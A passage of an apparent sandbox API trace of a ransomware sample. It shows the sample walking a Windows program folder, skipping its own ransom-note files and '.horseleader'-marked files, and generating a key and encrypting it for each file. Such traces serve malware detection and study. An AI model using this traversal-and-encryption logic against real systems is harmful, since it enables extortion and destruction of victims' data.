ftCreationTime.dwLowDateTime=0xb0eb1404, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0eb1404, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0eb1404, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13400, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="rtstreamsink.ax", cAlternateFileName="")) returned 1 [0251.370] lstrcmpiW (lpString1="rtstreamsink.ax", lpString2="Windows") returned -1 [0251.370] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax") returned 46 [0251.371] StrStrIW (lpFirst="rtstreamsink.ax", lpSrch=".horseleader") returned 0x0 [0251.371] lstrcmpW (lpString1="rtstreamsink.ax", lpString2="#Decrypt#.txt") returned 1 [0251.371] lstrcmpW (lpString1="rtstreamsink.ax", lpString2="_uninstalling_.png") returned 1 [0251.371] lstrlenW (lpString=".testttjffg") returned 11 [0251.371] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax", lpSrch=".testttjffg") returned 0x0 [0251.371] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.371] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.371] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsink.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.371] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="rtstreamsource.ax", cAlternateFileName="")) returned 1 [0251.372] lstrcmpiW (lpString1="rtstreamsource.ax", lpString2="Windows") returned -1 [0251.372] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax") returned 48 [0251.372] StrStrIW (lpFirst="rtstreamsource.ax", lpSrch=".horseleader") returned 0x0 [0251.372] lstrcmpW (lpString1="rtstreamsource.ax", lpString2="#Decrypt#.txt") returned 1 [0251.372] lstrcmpW (lpString1="rtstreamsource.ax", lpString2="_uninstalling_.png") returned 1 [0251.372] lstrlenW (lpString=".testttjffg") returned 11 [0251.372] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax", lpSrch=".testttjffg") returned 0x0 [0251.372] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.372] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.372] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsource.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.373] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd55c168a, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xd55c168a, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x18208, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="SecretST.TTF", cAlternateFileName="")) returned 1 [0251.373] lstrcmpiW (lpString1="SecretST.TTF", lpString2="Windows") returned -1 [0251.373] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF") returned 43 [0251.373] StrStrIW (lpFirst="SecretST.TTF", lpSrch=".horseleader") returned 0x0 [0251.373] lstrcmpW (lpString1="SecretST.TTF", lpString2="#Decrypt#.txt") returned 1 [0251.373] lstrcmpW (lpString1="SecretST.TTF", lpString2="_uninstalling_.png") returned 1 [0251.374] lstrlenW (lpString=".testttjffg") returned 11 [0251.374] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF", lpSrch=".testttjffg") returned 0x0 [0251.374] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.374] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.374] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF" (normalized: "c:\\program files\\dvd maker\\secretst.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.374] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9f0852f1, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f0852f1, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="Shared", cAlternateFileName="")) returned 1 [0251.374] lstrcmpiW (lpString1="Shared", lpString2="Windows") returned -1 [0251.374] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared") returned 37 [0251.374] lstrcmpW (lpString1="Shared", lpString2=".") returned 1 [0251.374] lstrcmpW (lpString1="Shared", lpString2="..") returned 1 [0251.374] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.374] GetProcessHeap () returned 0x780000 [0251.374] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0251.375] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*") returned 39 [0251.375] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9f0852f1, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f0852f1, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0251.377] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.377] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\.") returned 39 [0251.377] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.377] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9f0852f1, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f0852f1, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0251.377] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.377] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\..") returned 40 [0251.377] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.377] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.377] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dab239, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93dab239, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x68934cfd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x30e4, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Common.fxh", cAlternateFileName="")) returned 1 [0251.377] lstrcmpiW (lpString1="Common.fxh", lpString2="Windows") returned -1 [0251.377] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh") returned 48 [0251.378] StrStrIW (lpFirst="Common.fxh", lpSrch=".horseleader") returned 0x0 [0251.378] lstrcmpW (lpString1="Common.fxh", lpString2="#Decrypt#.txt") returned 1 [0251.378] lstrcmpW (lpString1="Common.fxh", lpString2="_uninstalling_.png") returned 1 [0251.378] lstrlenW (lpString=".testttjffg") returned 11 [0251.378] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh", lpSrch=".testttjffg") returned 0x0 [0251.378] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.378] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.378] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh" (normalized: "c:\\program files\\dvd maker\\shared\\common.fxh"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.378] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93d12cc5, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93d12cc5, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x6895ae5b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6d1f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DissolveAnother.png", cAlternateFileName="")) returned 1 [0251.378] lstrcmpiW (lpString1="DissolveAnother.png", lpString2="Windows") returned -1 [0251.378] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 57 [0251.379] StrStrIW (lpFirst="DissolveAnother.png", lpSrch=".horseleader") returned 0x0 [0251.379] lstrcmpW (lpString1="DissolveAnother.png", lpString2="#Decrypt#.txt") returned 1 [0251.379] lstrcmpW (lpString1="DissolveAnother.png", lpString2="_uninstalling_.png") returned 1 [0251.379] lstrlenW (lpString=".testttjffg") returned 11 [0251.379] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png", lpSrch=".testttjffg") returned 0x0 [0251.379] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.379] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.379] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.380] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93d38e22, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93d38e22, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x68980fb9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb7835, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DissolveNoise.png", cAlternateFileName="")) returned 1 [0251.380] lstrcmpiW (lpString1="DissolveNoise.png", lpString2="Windows") returned -1 [0251.381] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 55 [0251.381] StrStrIW (lpFirst="DissolveNoise.png", lpSrch=".horseleader") returned 0x0 [0251.381] lstrcmpW (lpString1="DissolveNoise.png", lpString2="#Decrypt#.txt") returned 1 [0251.381] lstrcmpW (lpString1="DissolveNoise.png", lpString2="_uninstalling_.png") returned 1 [0251.381] lstrlenW (lpString=".testttjffg") returned 11 [0251.381] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png", lpSrch=".testttjffg") returned 0x0 [0251.381] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.381] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.381] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.381] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f0852f1, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabb4389, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DvdStyles", cAlternateFileName="DVDSTY~1")) returned 1 [0251.381] lstrcmpiW (lpString1="DvdStyles", lpString2="Windows") returned -1 [0251.382] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 47 [0251.382] lstrcmpW (lpString1="DvdStyles", lpString2=".") returned 1 [0251.382] lstrcmpW (lpString1="DvdStyles", lpString2="..") returned 1 [0251.382] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.382] GetProcessHeap () returned 0x780000 [0251.382] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0251.382] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*") returned 49 [0251.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f0852f1, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabb4389, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0251.385] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.385] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\.") returned 49 [0251.385] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.385] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f0852f1, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabb4389, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0251.386] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.386] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\..") returned 50 [0251.386] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.386] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.386] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec183f4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec183f4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49c9fe3b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x278b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="16to9Squareframe_Buttongraphic.png", cAlternateFileName="")) returned 1 [0251.386] lstrcmpiW (lpString1="16to9Squareframe_Buttongraphic.png", lpString2="Windows") returned -1 [0251.386] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 82 [0251.386] StrStrIW (lpFirst="16to9Squareframe_Buttongraphic.png", lpSrch=".horseleader") returned 0x0 [0251.386] lstrcmpW (lpString1="16to9Squareframe_Buttongraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.386] lstrcmpW (lpString1="16to9Squareframe_Buttongraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.386] lstrlenW (lpString=".testttjffg") returned 11 [0251.386] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.386] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.387] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.387] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.388] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec3e551, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec3e551, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49c9fe3b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xcd6, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="16to9Squareframe_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.388] lstrcmpiW (lpString1="16to9Squareframe_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.388] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 88 [0251.388] StrStrIW (lpFirst="16to9Squareframe_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.388] lstrcmpW (lpString1="16to9Squareframe_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.388] lstrcmpW (lpString1="16to9Squareframe_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.388] lstrlenW (lpString=".testttjffg") returned 11 [0251.388] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.388] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.388] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.388] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.389] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec3e551, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec3e551, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49c9fe3b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xcf4, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="16to9Squareframe_VideoInset.png", cAlternateFileName="")) returned 1 [0251.403] lstrcmpiW (lpString1="16to9Squareframe_VideoInset.png", lpString2="Windows") returned -1 [0251.403] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 79 [0251.403] StrStrIW (lpFirst="16to9Squareframe_VideoInset.png", lpSrch=".horseleader") returned 0x0 [0251.403] lstrcmpW (lpString1="16to9Squareframe_VideoInset.png", lpString2="#Decrypt#.txt") returned 1 [0251.403] lstrcmpW (lpString1="16to9Squareframe_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0251.403] lstrlenW (lpString=".testttjffg") returned 11 [0251.403] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png", lpSrch=".testttjffg") returned 0x0 [0251.403] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.403] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.404] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.405] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec646ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec646ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e55, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="4to3Squareframe_Buttongraphic.png", cAlternateFileName="")) returned 1 [0251.405] lstrcmpiW (lpString1="4to3Squareframe_Buttongraphic.png", lpString2="Windows") returned -1 [0251.405] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png") returned 81 [0251.405] StrStrIW (lpFirst="4to3Squareframe_Buttongraphic.png", lpSrch=".horseleader") returned 0x0 [0251.405] lstrcmpW (lpString1="4to3Squareframe_Buttongraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.405] lstrcmpW (lpString1="4to3Squareframe_Buttongraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.405] lstrlenW (lpString=".testttjffg") returned 11 [0251.406] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.406] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.406] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, 